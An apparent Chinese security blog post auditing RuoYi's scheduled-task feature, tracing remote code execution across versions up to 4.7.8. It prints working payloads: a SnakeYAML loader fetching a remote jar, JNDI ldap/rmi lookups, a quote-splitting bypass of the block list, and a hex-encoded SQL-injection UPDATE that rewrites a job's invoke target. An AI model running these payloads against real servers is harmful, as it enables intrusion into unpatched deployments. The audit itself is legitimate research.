<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Yu9">
    
    <title>
        
            若依定时任务分析 |
        
        Yu9&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/blog/css/style.css">

    
        <link rel="shortcut icon" href="/blog/images/logo.png">
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/font/css/regular.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/font/css/solid.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/font/css/brands.min.css">
    
        
            
                
<link rel="stylesheet" href="/blog/css/custom.css">

            
        
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"wsyu9a.github.io","root":"/blog/","language":"zh-CN","path":"search.xml"}
    KEEP.theme_config = {"base_info":{"primary_color":"#999999","title":"Yu9's Blog","author":"Yu9","avatar":"/images/avatar.png","logo":"/images/logo.png","favicon":"/images/logo.png"},"menu":{"Home":"/","Archives":"/archives","Tags":"/tags","About":"/about"},"first_screen":{"enable":true,"background_img":"/images/bgc.png","background_img_dark":"/images/bgc.png","description":"Runtime.getRuntime().exec(\"变有钱\")","hitokoto":false},"social_contact":{"enable":true,"links":{"github":"https://github.com/wsYu9a","weixin":"img | /images/wechat.jpg"}},"scroll":{"progress_bar":false,"percent":true,"hide_header":true},"home":{"category":false,"tag":true,"announcement":null},"post":{"author_badge":{"enable":false,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD","copyright_info":false,"share":true,"reward":{"enable":false,"img_link":null,"text":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"obsidian"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":true,"provider":"cdnjs"},"pjax":{"enable":true},"footer":{"since":2023,"word_count":true,"icp":{"enable":false,"record_code":null,"url":"https://beian.miit.gov.cn"},"site_deploy":{"enable":false,"provider":"github","url":null},"shields_style":{"enable":true,"custom":[{"link_url":null,"img_url":null}]}},"inject":{"enable":true,"css":["/css/custom.css"]},"root":"/blog","source_data":{},"version":"4.1.0"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/blog/">
                    <img src="/blog/images/logo.png">
                </a>
            
            <a class="site-name border-box" href="/blog/">
               Yu9&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/blog/"
                            >
                                
                                首页
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/blog/archives"
                            >
                                
                                归档
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/blog/tags"
                            >
                                
                                标签
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/blog/about"
                            >
                                
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/blog/"
                    >首页</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/blog/archives"
                    >归档</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/blog/tags"
                    >标签</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/blog/about"
                    >关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        若依定时任务分析
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/blog/images/avatar.png">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Yu9</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2024-03-17</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Tue Mar 19 2024 02:59:46 GMT+0000">2024-03-19</span>
            </span>
        

        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/blog/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>1.9k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>7 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <p><strong>文章首发于奇安信攻防社区</strong></p>
<p><strong>链接：</strong><a class="link"   target="_blank" rel="noopener" href="https://forum.butian.net/share/2796" >https://forum.butian.net/share/2796<i class="fas fa-external-link-alt"></i></a></p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>关于若依漏洞或者是审计的文章网上挺多的，本来就只是想写一下最新版4.7.8的RCE。因为之前没接触过若依就打算看看定时任务实现的原理以及历史的漏洞，但是在查阅资料的时候，发现了<strong>一些</strong>文章给的poc有问题，比如作者写的是&lt;4.7.2时，给的是<code>org.springframework.jndi.JndiLocatorDelegate.lookup(&#39;r&#39;m&#39;i://ip:端口/refObj&#39;)</code>，大概作者的目的是想说明可以通过若依对字符串的处理的一些问题(参数中的<code>&#39;</code>会替换为空)绕过对<code>rmi</code>的过滤，但是却没有考虑到<code>org.springframework.jndi</code>在4.7.1版本中已经加入了黑名单。作者也只是给出了poc，并没有复现的过程！</p>
<h2 id="计划任务实现原理"><a href="#计划任务实现原理" class="headerlink" title="计划任务实现原理"></a>计划任务实现原理</h2><p>从<a class="link"   target="_blank" rel="noopener" href="https://doc.ruoyi.vip/ruoyi/document/htsc.html#%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1" >官方文档<i class="fas fa-external-link-alt"></i></a>可以看出可以通过两种方法调用目标类：</p>
<ul>
<li>Bean调用示例：ryTask.ryParams(‘ry’) </li>
<li>Class类调用示例：com.ruoyi.quartz.task.RyTask.ryParams(‘ry’)</li>
</ul>
<p>接下来咱调试一下，看看具体是如何实现的这个功能的</p>
<p>首先直接在测试类下个断点，看看调用</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e708f929690.png"  alt="image-20240305195847965"></p>
<p>通过系统默认的任务1来执行这个测试类</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e709c3aa9c9.png"  alt="image-20240305200210899"></p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e709b09fcbe.png"  alt="image-20240305200151822"></p>
<p>在调用过程中，会发现在<code>com.ruoyi.quartz.util.JobInvokeUtil</code>类中存在两个名为<code>invokeMethod</code>的方法，并前后各调用了一次</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e70e9d720fc.png"  alt="image-20240305202252424"></p>
<p>在第一个<code>invokeMethod</code>方法中对调用目标字符串的类型进行判断，判断是Bean还是Class。</p>
<ul>
<li>bean就通过getBean()直接获取bean的实例</li>
<li>类名就通过反射获取类的实例</li>
</ul>
<p>然后调用第二个<code>invokeMethod</code>方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!isValidClassName(beanName))&#123;</span><br><span class="line">    <span class="type">Object</span> <span class="variable">bean</span> <span class="operator">=</span> SpringUtils.getBean(beanName);</span><br><span class="line">    invokeMethod(bean, methodName, methodParams);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">Object</span> <span class="variable">bean</span> <span class="operator">=</span> Class.forName(beanName).newInstance();</span><br><span class="line">    invokeMethod(bean, methodName, methodParams);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>第二个<code>invokeMethod</code>这个方法通过反射来加载测试类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (StringUtils.isNotNull(methodParams) &amp;&amp; methodParams.size() &gt; <span class="number">0</span>)&#123;</span><br><span class="line">    <span class="type">Method</span> <span class="variable">method</span> <span class="operator">=</span> bean.getClass().getDeclaredMethod(methodName, getMethodParamsType(methodParams));</span><br><span class="line">    method.invoke(bean, getMethodParamsValue(methodParams));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这大概就是定时任务加载类的逻辑</p>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>接着我们新增一个定时任务，看看在创建的过程中对调用目标字符串做了哪些处理</p>
<p>抓包可以看到直接调用了<code>/monitor/job/add</code>这个接口</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e7112778db0.png"  alt="image-20240305203342583"></p>
<p>可以看到就只是判断了一下，目标字符串是否包含<code>rmi://</code>，这就导致导致攻击者可以调用任意类、方法及参数触发反射执行命令。</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e71221e8b7d.png"  alt="image-20240305203753016"></p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e712556acdd.png"  alt="image-20240305203844623"></p>
<p>由于反射时所需要的：类、方法、参数都是我们可控的，所以我们只需传入一个能够执行命令的类方法就能达到getshell的目的，该类只需要满足如下几点要求即可：</p>
<ul>
<li>具有public类型的无参构造方法</li>
<li>自身具有public类型且可以执行命令的方法</li>
</ul>
<h2 id="4-6-2"><a href="#4-6-2" class="headerlink" title="4.6.2"></a>4.6.2</h2><p>因为目前对<strong>调用目标字符串</strong>限制不多，so直接拿网上公开的poc打吧！</p>
<ul>
<li>使用Yaml.load()来打SnakeYAML反序列化</li>
<li>JNDI注入</li>
</ul>
<h3 id="SnakeYAML反序列化"><a href="#SnakeYAML反序列化" class="headerlink" title="SnakeYAML反序列化"></a>SnakeYAML反序列化</h3><p>探测SnakeYAMLpoc：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String poc = &quot;&#123;!!java.net.URL [\&quot;http://5dsff0.dnslog.cn/\&quot;]: 1&#125;&quot;;</span><br></pre></td></tr></table></figure>

<p>利用SPI机制-基于ScriptEngineManager利用链来执行命令，直接使用这个师傅写好的脚本：<a class="link"   target="_blank" rel="noopener" href="https://github.com/artsploit/yaml-payload" >https://github.com/artsploit/yaml-payload<i class="fas fa-external-link-alt"></i></a></p>
<p>1）把这块修改成要执行的命令</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e73554c177b.png"  alt="image-20240305230802764"></p>
<p>2）把项目生成jar包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac src/artsploit/AwesomeScriptEngineFactory.java　　　　//编译java文件</span><br><span class="line">jar -cvf yaml-payload.jar -C src/ .　　　　　　　　　　　　　//打包成jar包</span><br></pre></td></tr></table></figure>

<p>3）在yaml-payload.jar根目录下起一个web服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m http.server 9999</span><br></pre></td></tr></table></figure>

<p>4）在计划任务添加payload，执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">org.yaml.snakeyaml.Yaml.load(&#x27;!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [&quot;http://127.0.0.1:9999/yaml-payload.jar&quot;]]]]&#x27;)</span><br></pre></td></tr></table></figure>

<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e7394e5398e.png"  alt="image-20240305232500918"></p>
<h3 id="JNDI注入"><a href="#JNDI注入" class="headerlink" title="JNDI注入"></a>JNDI注入</h3><p>使用yakit起一个返连服务</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e73eb20a544.png"  alt="image-20240305234800803"></p>
<p>poc：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javax.naming.InitialContext.lookup(&#x27;ldap://127.0.0.1:8085/calc&#x27;)</span><br></pre></td></tr></table></figure>

<p>nc监听端口</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e73e86ea61b.png"  alt="image-20240305234715061"></p>
<p><img   src="http://124.71.147.32/uploads/2024/03/05/65e73e9a8c282.png"  alt="image-20240305234736910"></p>
<h2 id="4-6-2-1"><a href="#4-6-2-1" class="headerlink" title="&lt; 4.6.2"></a>&lt; 4.6.2</h2><h3 id="rmi"><a href="#rmi" class="headerlink" title="rmi"></a>rmi</h3><p>上边的分析是拿4.6.2版本分析的，在创建定时任务时会判断目标字符串中有没有rmi关键字。后边有改回来看一下，发现在4.6.2版本以下，在创建定时任务时是没有任何过滤的。</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e845a7cd98b.png"  alt="image-20240306182957873"></p>
<p>所以在补充一个rmi的poc：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">org.springframework.jndi.JndiLocatorDelegate.lookup(&#x27;rmi://127.0.0.1:1099/refObj&#x27;)</span><br></pre></td></tr></table></figure>

<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e84733450b7.png"  alt="image-20240306183633480"></p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e8474d500a9.png"  alt="image-20240306183659672"></p>
<h2 id=""><a href="#" class="headerlink" title="&lt;4.7.0"></a>&lt;4.7.0</h2><p><code>4.6.2~4.7.1</code>新增黑名单限制调用字符串</p>
<ul>
<li>定时任务屏蔽ldap远程调用</li>
<li>定时任务屏蔽http(s)远程调用</li>
<li>定时任务屏蔽rmi远程调用</li>
</ul>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e84bf83f1be.png"  alt="image-20240306185654502"></p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e84c21c6567.png"  alt="image-20240306185736206"></p>
<p>来个小插曲，之前又看到一个文章，阅读量还不少类，师傅给出的poc是利用范围是**&lt;4.7.2**</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e84f09e5e85.png"  alt="image-20240306191000306"></p>
<p>后边发现不止这一篇，其他就不在举例了。</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e853e1e204b.png"  alt="image-20240306193040061"></p>
<p>但是我去翻了diff，发现在4.7.1中的黑名单已经过滤了这些poc。</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e84f5fd29a2.png"  alt="image-20240306191126087"></p>
<h3 id="单引号绕过"><a href="#单引号绕过" class="headerlink" title="单引号绕过"></a>单引号绕过</h3><p>在4.7.0的版本以下，仅仅只是屏蔽了ldap、http(s)、ldap。这里可以结合若依对将参数中的所有单引号替换为空来绕过</p>
<p>poc、例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">org.springframework.jndi.JndiLocatorDelegate.lookup(&#x27;r&#x27;m&#x27;i://127.0.0.1:1099/refObj&#x27;)</span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>创建任务时<code>r&#39;m&#39;i</code>可以绕过对<code>rmi</code>的过滤</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e88cb0a3739.png"  alt="image-20240306233303535"></p>
<p>之前分析的定时任务运行的原理，会在<code>com.ruoyi.quartz.util.JobInvokeUtil</code>类中第一个<code>invokeMethod</code>方法调用<code>getMethodParams</code>方法来获取参数</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e88d1b139f7.png"  alt="image-20240306233449771"></p>
<p>跟进之后发现会把参数中的<code>&#39;</code>替换为空</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e88d7600c13.png"  alt="image-20240306233620830"></p>
<p>打个断点调试一下</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e88de696756.png"  alt="image-20240306233813294"></p>
<h2 id="-1"><a href="#-1" class="headerlink" title="&lt;4.7.2"></a>&lt;4.7.2</h2><p>在这个版本下可以看到有可以看到有ldaps、配置文件rce等方法bypass，网上挺多文章的就不分析了</p>
<h3 id="ldaps"><a href="#ldaps" class="headerlink" title="ldaps"></a>ldaps</h3><h3 id="配置文件rce"><a href="#配置文件rce" class="headerlink" title="配置文件rce"></a>配置文件rce</h3><h2 id="4-7-3"><a href="#4-7-3" class="headerlink" title="4.7.3"></a>4.7.3</h2><p>在4.7.3的版本下，又增加了白名单，只能调用com.ruoyi包下的类！并且把之前所有的路堵死了</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e8708281228.png"  alt="image-20240306213248788"></p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e870af7f4e6.png"  alt="image-20240306213334189"></p>
<h2 id="4-7-8（最新版）"><a href="#4-7-8（最新版）" class="headerlink" title="4.7.8（最新版）"></a>4.7.8（最新版）</h2><p>依旧是没办法绕过黑白名单的限制。之前我们大概分析了一下定时任务的创建。对<strong>调用目标字符串</strong>过滤是在定时任务创建时进行的</p>
<p>审计之后可以看到，对目标字符串的过滤只发生在增加、修改计划任务时</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e872ce354d6.png"  alt="image-20240306214236876"></p>
<p>创建后的定时任务信息存储在<strong>sys_job</strong>表中</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87232ae678.png"  alt="image-20240306214001345"></p>
<p>结合4.7.5 版本下的sql注入漏洞，直接修改表中的数据</p>
<p>参考：<a class="link"   target="_blank" rel="noopener" href="https://gitee.com/y_project/RuoYi/issues/I65V2B" >https://gitee.com/y_project/RuoYi/issues/I65V2B<i class="fas fa-external-link-alt"></i></a></p>
<p>在<code>com.ruoyi.generator.controller.GenController#create</code></p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87a082fc99.png"  alt="image-20240306221326697"></p>
<p>这块直接调用了<code>genTableService.createTable()</code>,咱直接跟进去看看</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87a4b63f69.png"  alt="image-20240306221433954"></p>
<p>Mapper语句：</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87a7029dab.png"  alt="image-20240306221510785"></p>
<p>接下来创建一个定时任务调用这个类，直接从sys_job表中把某一个定时任务调用目标字符串(invoke_target字段)改了</p>
<p>先谈个dnslog试试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">genTableServiceImpl.createTable(&#x27;UPDATE sys_job SET invoke_target = &#x27;javax.naming.InitialContext.lookup(&#x27;ldap://xcrlginufj.dgrh3.cn&#x27;)&#x27; WHERE job_id = 1;&#x27;)</span><br></pre></td></tr></table></figure>

<p>但会触发黑名单</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87d43a8379.png"  alt="image-20240306222714229"></p>
<p>由于是执行sql语句，直接将value转为16进制即可</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87d74d32b7.png"  alt="image-20240306222803488"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">genTableServiceImpl.createTable(&#x27;UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f7863726c67696e75666a2e64677268332e636e2729 WHERE job_id = 1;&#x27;)</span><br></pre></td></tr></table></figure>

<p>可以成功创建</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87da960116.png"  alt="image-20240306222855973"></p>
<p>运行后任务1的<strong>调用目标字符串</strong>也被成功修改</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87e173d364.png"  alt="image-20240306223045794"></p>
<p>紧接着运行任务1</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87e31f2bd0.png"  alt="image-20240306223112608"></p>
<p>接下来谈个计算机</p>
<p>yakit开个反连，配置一下</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87f1921c43.png"  alt="image-20240306223503680"></p>
<p>执行上边的步骤修改任务1，在运行任务1</p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87f44e8cdc.png"  alt="image-20240306223547419"></p>
<p><img   src="http://124.71.147.32/uploads/2024/03/06/65e87f0963833.png"  alt="image-20240306223447821"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>碰上前言中说到的事确实感到挺无奈却又无可奈何。也有可能是我能力不够分析有误，如果有问题希望各位师傅及时指正！</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a class="link"   target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10687" >https://xz.aliyun.com/t/10687<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://y4tacker.github.io/2022/02/08/year/2022/2/SnakeYAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8A%E5%8F%AF%E5%88%A9%E7%94%A8Gadget%E5%88%86%E6%9E%90" >https://y4tacker.github.io/2022/02/08/year/2022/2/SnakeYAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8A%E5%8F%AF%E5%88%A9%E7%94%A8Gadget%E5%88%86%E6%9E%90<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/pursue-security/p/17658404.html#_label1_3" >https://www.cnblogs.com/pursue-security/p/17658404.html#_label1_3<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10957" >https://xz.aliyun.com/t/10957<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://github.com/luelueking/RuoYi-v4.7.8-RCE-POC" >https://github.com/luelueking/RuoYi-v4.7.8-RCE-POC<i class="fas fa-external-link-alt"></i></a></p>

                </div>
                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/blog/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="分享到 QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="分享到微信"
            data-tooltip-img-tip="微信扫一扫"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="分享到微博"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/blog/2024/03/18/240318cc%E9%93%BE%E6%80%BB%E7%BB%93/"
                                   title="commons-collections总结梳理"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">commons-collections总结梳理</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/blog/2024/03/05/240304PB-CMS/"
                                   title="PB-CMS代码审计"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">PB-CMS代码审计</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86"><span class="nav-text">计划任务实现原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-6-2"><span class="nav-text">4.6.2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SnakeYAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-text">SnakeYAML反序列化</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#JNDI%E6%B3%A8%E5%85%A5"><span class="nav-text">JNDI注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-6-2-1"><span class="nav-text">&lt; 4.6.2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#rmi"><span class="nav-text">rmi</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-text">&lt;4.7.0</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8D%95%E5%BC%95%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-text">单引号绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#-1"><span class="nav-text">&lt;4.7.2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ldaps"><span class="nav-text">ldaps</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6rce"><span class="nav-text">配置文件rce</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-7-3"><span class="nav-text">4.7.3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" 